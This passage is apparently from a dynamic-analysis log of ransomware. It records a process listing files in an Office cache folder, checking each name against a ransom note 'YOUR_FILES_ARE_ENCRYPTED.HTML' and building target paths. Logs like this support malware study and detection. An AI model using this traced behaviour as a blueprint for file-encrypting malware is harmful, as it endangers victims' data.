ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3be8, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="05BDDC85-1B21-40A1-AD47-D6AD70518BA9", cAlternateFileName="05BDDC~1")) returned 1 [0111.357] StrStrIW (lpFirst="05BDDC85-1B21-40A1-AD47-D6AD70518BA9", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.357] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\05BDDC85-1B21-40A1-AD47-D6AD70518BA9") returned 157 [0111.358] PathFindExtensionW (pszPath="05BDDC85-1B21-40A1-AD47-D6AD70518BA9") returned="" [0111.358] lstrlenW (lpString="") returned 0 [0111.358] PathFindExtensionW (pszPath="05BDDC85-1B21-40A1-AD47-D6AD70518BA9") returned="" [0111.358] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb495ab41, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb495ab41, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb49680d5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xa99, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="068F7142-C9A9-4F1D-9769-81D2029ED079", cAlternateFileName="068F71~1")) returned 1 [0111.358] StrStrIW (lpFirst="068F7142-C9A9-4F1D-9769-81D2029ED079", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.358] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\068F7142-C9A9-4F1D-9769-81D2029ED079") returned 157 [0111.358] PathFindExtensionW (pszPath="068F7142-C9A9-4F1D-9769-81D2029ED079") returned="" [0111.358] lstrlenW (lpString="") returned 0 [0111.358] PathFindExtensionW (pszPath="068F7142-C9A9-4F1D-9769-81D2029ED079") returned="" [0111.358] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8494d29, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc8494d29, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc8496206, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xa96, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="08DD48C4-4C22-48B1-8676-03955502381B", cAlternateFileName="08DD48~1")) returned 1 [0111.358] StrStrIW (lpFirst="08DD48C4-4C22-48B1-8676-03955502381B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.358] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\08DD48C4-4C22-48B1-8676-03955502381B") returned 157 [0111.358] PathFindExtensionW (pszPath="08DD48C4-4C22-48B1-8676-03955502381B") returned="" [0111.358] lstrlenW (lpString="") returned 0 [0111.358] PathFindExtensionW (pszPath="08DD48C4-4C22-48B1-8676-03955502381B") returned="" [0111.358] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b5398c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82b5398c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82b54d17, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x5ba7, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="0BB3D81C-E14E-48A8-9E37-42996BD92C45", cAlternateFileName="0BB3D8~1")) returned 1 [0111.358] StrStrIW (lpFirst="0BB3D81C-E14E-48A8-9E37-42996BD92C45", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.358] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\0BB3D81C-E14E-48A8-9E37-42996BD92C45") returned 157 [0111.358] PathFindExtensionW (pszPath="0BB3D81C-E14E-48A8-9E37-42996BD92C45") returned="" [0111.358] lstrlenW (lpString="") returned 0 [0111.358] PathFindExtensionW (pszPath="0BB3D81C-E14E-48A8-9E37-42996BD92C45") returned="" [0111.358] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82c946be, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82c946be, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82c946be, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x14b50, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="0FFEDD2D-75F1-4D91-8A68-D07299430A95", cAlternateFileName="0FFEDD~1")) returned 1 [0111.358] StrStrIW (lpFirst="0FFEDD2D-75F1-4D91-8A68-D07299430A95", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.358] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\0FFEDD2D-75F1-4D91-8A68-D07299430A95") returned 157 [0111.358] PathFindExtensionW (pszPath="0FFEDD2D-75F1-4D91-8A68-D07299430A95") returned="" [0111.358] lstrlenW (lpString="") returned 0 [0111.358] PathFindExtensionW (pszPath="0FFEDD2D-75F1-4D91-8A68-D07299430A95") returned="" [0111.358] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b28e4c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82b28e4c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82b28e4c, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2426, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="136081F3-73A0-4FF7-B28C-3470DE19BBF1", cAlternateFileName="136081~1")) returned 1 [0111.358] StrStrIW (lpFirst="136081F3-73A0-4FF7-B28C-3470DE19BBF1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.358] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\136081F3-73A0-4FF7-B28C-3470DE19BBF1") returned 157 [0111.358] PathFindExtensionW (pszPath="136081F3-73A0-4FF7-B28C-3470DE19BBF1") returned="" [0111.358] lstrlenW (lpString="") returned 0 [0111.358] PathFindExtensionW (pszPath="136081F3-73A0-4FF7-B28C-3470DE19BBF1") returned="" [0111.358] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc84be520, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc84be520, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc84bf915, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1193, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="149EF4F4-82E0-49BF-99DB-2EA4A1B5FD74", cAlternateFileName="149EF4~1")) returned 1 [0111.358] StrStrIW (lpFirst="149EF4F4-82E0-49BF-99DB-2EA4A1B5FD74", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.358] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\149EF4F4-82E0-49BF-99DB-2EA4A1B5FD74") returned 157 [0111.359] PathFindExtensionW (pszPath="149EF4F4-82E0-49BF-99DB-2EA4A1B5FD74") returned="" [0111.359] lstrlenW (lpString="") returned 0 [0111.359] PathFindExtensionW (pszPath="149EF4F4-82E0-49BF-99DB-2EA4A1B5FD74") returned="" [0111.359] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4d9ad45, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4d9ad45, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4d9ad45, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x812e, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="15A1ED83-2E0D-4739-B941-AD1703A61A1C", cAlternateFileName="15A1ED~1")) returned 1 [0111.359] StrStrIW (lpFirst="15A1ED83-2E0D-4739-B941-AD1703A61A1C", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.359] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\15A1ED83-2E0D-4739-B941-AD1703A61A1C") returned 157 [0111.359] PathFindExtensionW (pszPath="15A1ED83-2E0D-4739-B941-AD1703A61A1C") returned="" [0111.359] lstrlenW (lpString="") returned 0 [0111.359] PathFindExtensionW (pszPath="15A1ED83-2E0D-4739-B941-AD1703A61A1C") returned="" [0111.359] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabb6b457, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xabb6b457, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xabb6b457, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1bc0, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="1604DFC0-3711-40F4-A312-5716BCF1C705", cAlternateFileName="1604DF~1")) returned 1 [0111.359] StrStrIW (lpFirst="1604DFC0-3711-40F4-A312-5716BCF1C705", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.359] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\1604DFC0-3711-40F4-A312-5716BCF1C705") returned 157 [0111.359] PathFindExtensionW (pszPath="1604DFC0-3711-40F4-A312-5716BCF1C705") returned="" [0111.359] lstrlenW (lpString="") returned 0 [0111.359] PathFindExtensionW (pszPath="1604DFC0-3711-40F4-A312-5716BCF1C705") returned="" [0111.359] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc860f3fd, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc860f3fd, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc86107a9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xc69, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="1A8199FD-6A7F-407E-BA91-64E3C5A3EECB", cAlternateFileName="1A8199~1")) returned 1 [0111.359] StrStrIW (lpFirst="1A8199FD-6A7F-407E-BA91-64E3C5A3EECB", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.359] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\1A8199FD-6A7F-407E-BA91-64E3C5A3EECB") returned 157 [0111.359] PathFindExtensionW (pszPath="1A8199FD-6A7F-407E-BA91-64E3C5A3EECB") returned="" [0111.359] lstrlenW (lpString="") returned 0 [0111.359] PathFindExtensionW (pszPath="1A8199FD-6A7F-407E-BA91-64E3C5A3EECB") returned="" [0111.359] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9f20e3, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9f20e3, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9f20e3, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x80bb, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="1E1D102B-3E38-42D5-97CF-F307C2E53FA9", cAlternateFileName="1E1D10~1")) returned 1 [0111.359] StrStrIW (lpFirst="1E1D102B-3E38-42D5-97CF-F307C2E53FA9", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.359] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\1E1D102B-3E38-42D5-97CF-F307C2E53FA9") returned 157 [0111.359] PathFindExtensionW (pszPath="1E1D102B-3E38-42D5-97CF-F307C2E53FA9") returned="" [0111.359] lstrlenW (lpString="") returned 0 [0111.359] PathFindExtensionW (pszPath="1E1D102B-3E38-42D5-97CF-F307C2E53FA9") returned="" [0111.359] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabb5b5f4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xabb5b5f4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xabb5dbcb, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2084, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="21676BA8-01CC-477B-8C3D-258E774A1164", cAlternateFileName="21676B~1")) returned 1 [0111.359] StrStrIW (lpFirst="21676BA8-01CC-477B-8C3D-258E774A1164", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.359] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\21676BA8-01CC-477B-8C3D-258E774A1164") returned 157 [0111.359] PathFindExtensionW (pszPath="21676BA8-01CC-477B-8C3D-258E774A1164") returned="" [0111.359] lstrlenW (lpString="") returned 0 [0111.359] PathFindExtensionW (pszPath="21676BA8-01CC-477B-8C3D-258E774A1164") returned="" [0111.359] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4efb86e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4efb86e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4efcbea, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x6b94, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="23BF312F-1BE9-4411-BFF6-FA34461B5139", cAlternateFileName="23BF31~1")) returned 1 [0111.359] StrStrIW (lpFirst="23BF312F-1BE9-4411-BFF6-FA34461B5139", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.359] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\23BF312F-1BE9-4411-BFF6-FA34461B5139") returned 157 [0111.359] PathFindExtensionW (pszPath="23BF312F-1BE9-4411-BFF6-FA34461B5139") returned="" [0111.360] lstrlenW (lpString="") returned 0 [0111.360] PathFindExtensionW (pszPath="23BF312F-1BE9-4411-BFF6-FA34461B5139") returned="" [0111.360] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab9d4b04, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xab9d4b04, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xab9d5f98, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3bcb, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="23FB071D-E9EC-4666-A0CB-7D6993563959", cAlternateFileName="23FB07~1")) returned 1 [0111.360] StrStrIW (lpFirst="23FB071D-E9EC-4666-A0CB-7D6993563959", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.360] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\23FB071D-E9EC-4666-A0CB-7D6993563959") returned 157 [0111.360] PathFindExtensionW (pszPath="23FB071D-E9EC-4666-A0CB-7D6993563959") returned="" [0111.360] lstrlenW (lpString="") returned 0 [0111.360] PathFindExtensionW (pszPath="23FB071D-E9EC-4666-A0CB-7D6993563959") returned="" [0111.360] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb498434b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb498434b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4985694, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2c73, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="278BB2FB-4662-4807-884C-59E63DBF6D36", cAlternateFileName="278BB2~1")) returned 1 [0111.360] StrStrIW (lpFirst="278BB2FB-4662-4807-884C-59E63DBF6D36", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.360] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\278BB2FB-4662-4807-884C-59E63DBF6D36") returned 157 [0111.360] PathFindExtensionW (pszPath="278BB2FB-4662-4807-884C-59E63DBF6D36") returned="" [0111.360] lstrlenW (lpString="") returned 0 [0111.360] PathFindExtensionW (pszPath="278BB2FB-4662-4807-884C-59E63DBF6D36") returned="" [0111.360] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a897d3, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc8a897d3, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc8a8ab48, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1fdd, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="292EB0B0-CEFD-4710-B2BC-B6DEBB11376B", cAlternateFileName="292EB0~1")) returned 1 [0111.360] StrStrIW (lpFirst="292EB0B0-CEFD-4710-B2BC-B6DEBB11376B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.360] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\292EB0B0-CEFD-4710-B2BC-B6DEBB11376B") returned 157 [0111.360] PathFindExtensionW (pszPath="292EB0B0-CEFD-4710-B2BC-B6DEBB11376B") returned="" [0111.360] lstrlenW (lpString="") returned 0 [0111.360] PathFindExtensionW (pszPath="292EB0B0-CEFD-4710-B2BC-B6DEBB11376B") returned="" [0111.360] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb49f4ff8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb49f4ff8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb49f62e6, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2fff, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="29A9F36E-19FA-474E-A88B-9EE7C96DCBA2", cAlternateFileName="29A9F3~1")) returned 1 [0111.360] StrStrIW (lpFirst="29A9F36E-19FA-474E-A88B-9EE7C96DCBA2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.360] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\29A9F36E-19FA-474E-A88B-9EE7C96DCBA2") returned 157 [0111.360] PathFindExtensionW (pszPath="29A9F36E-19FA-474E-A88B-9EE7C96DCBA2") returned="" [0111.360] lstrlenW (lpString="") returned 0 [0111.360] PathFindExtensionW (pszPath="29A9F36E-19FA-474E-A88B-9EE7C96DCBA2") returned="" [0111.360] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb502ff48, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb502ff48, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb503124f, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x666c, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="2A756DDE-34E8-4DC2-855B-44682E9D4845", cAlternateFileName="2A756D~1")) returned 1 [0111.360] StrStrIW (lpFirst="2A756DDE-34E8-4DC2-855B-44682E9D4845", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.360] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\2A756DDE-34E8-4DC2-855B-44682E9D4845") returned 157 [0111.360] PathFindExtensionW (pszPath="2A756DDE-34E8-4DC2-855B-44682E9D4845") returned="" [0111.360] lstrlenW (lpString="") returned 0 [0111.360] PathFindExtensionW (pszPath="2A756DDE-34E8-4DC2-855B-44682E9D4845") returned="" [0111.360] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb49fb16b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb49fb16b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb49fb16b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4af4, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="2DFAAC69-9C98-47D4-8E3B-6AD109FD232D", cAlternateFileName="2DFAAC~1")) returned 1 [0111.360] StrStrIW (lpFirst="2DFAAC69-9C98-47D4-8E3B-6AD109FD232D", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.360] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\2DFAAC69-9C98-47D4-8E3B-6AD109FD232D") returned 157 [0111.360] PathFindExtensionW (pszPath="2DFAAC69-9C98-47D4-8E3B-6AD109FD232D") returned="" [0111.360] lstrlenW (lpString="") returned 0 [0111.360] PathFindExtensionW (pszPath="2DFAAC69-9C98-47D4-8E3B-6AD109FD232D") returned="" [0111.361] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a80f08, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc8a80f08, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc8a883fc, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x507, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="2EC88447-26FF-4E32-8D81-5ABC75AE65DB", cAlternateFileName="2EC884~1")) returned 1 [0111.361] StrStrIW (lpFirst="2EC88447-26FF-4E32-8D81-5ABC75AE65DB", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.361] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\2EC88447-26FF-4E32-8D81-5ABC75AE65DB") returned 157 [0111.361] PathFindExtensionW (pszPath="2EC88447-26FF-4E32-8D81-5ABC75AE65DB") returned="" [0111.361] lstrlenW (lpString="") returned 0 [0111.361] PathFindExtensionW (pszPath="2EC88447-26FF-4E32-8D81-5ABC75AE65DB") returned="" [0111.361] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4ea9c0d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4ea9c0d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4ea9c0d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x8b27, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="33F63883-F0AE-4AB6-B4F0-30BB1951B381", cAlternateFileName="33F638~1")) returned 1 [0111.362] StrStrIW (lpFirst="33F63883-F0AE-4AB6-B4F0-30BB1951B381", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.362] wnsprintfW (in: pszDest=0x30c81a0, 